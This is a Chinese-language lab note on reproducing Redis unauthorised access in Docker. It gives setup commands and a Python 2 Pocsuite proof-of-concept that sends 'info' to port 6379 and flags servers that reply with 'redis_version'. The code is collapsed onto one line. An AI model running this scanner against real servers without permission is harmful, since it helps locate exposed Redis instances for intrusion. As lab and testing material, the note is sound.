Redis未授权访问docker复现

docker搜索Redis镜像

docker search redis

拉去镜像到本地

docker pull redis

查看下载好的镜像

docker images

运行镜像

docker run -p 6379:6379 -d redis

-p 将容器的6379端口映射到主机的6379端口。

-d 将容器后台运行。

查看运行中的镜像

docker ps

POC构成

#!/usr/bin/env python# -*- coding: utf-8 -*-import socketfrom pocsuite.utils import registerfrom pocsuite.poc import Output, POCBaseclass TestPOC(POCBase):    vulID = '0'    version = '1'    author = 'nw01f'    vulDate = '2018-10-23'    createDate = '2018-10-23'    updateDate = '2018-10-23'    references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/']    name = 'Redis Unauthorized'    appPowerLink = 'https://www.redis.io'    appName = 'Redis'    appVersion = 'All'    vulType = 'Unauthorized'    desc = '''            redis Unauthorized    '''    samples = ['']    def _verify(self):        result = {}        payload = '\x69\x6e\x66\x6f\x0d\x0a'     ##   info/r/n        s = socket.socket()        socket.setdefaulttimeout(4)        try:            host = self.url.split(':')[1].strip('/')            if len(self.url.split(':')) > 2:                port = int(self.url.split(':')[2].strip('/'))            else:                port = 6379            s.connect((host, port))            s.send(payload)            data = s.recv(1024)            if data and 'redis_version' in data:                result['VerifyInfo'] = {}                result['VerifyInfo']['url'] = self.url                result['VerifyInfo']['port'] = port                result['VerifyInfo']['result'] = data[:20]        except Exception as e:            print e        s.close()        return self.parse_attack(result)    def _attack(self):        return self._verify()    def parse_attack(self, result):        output = Output(self)        if result:            output.success(result)        else:            output.fail("error")        return outputregister(TestPOC)

参考链接

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/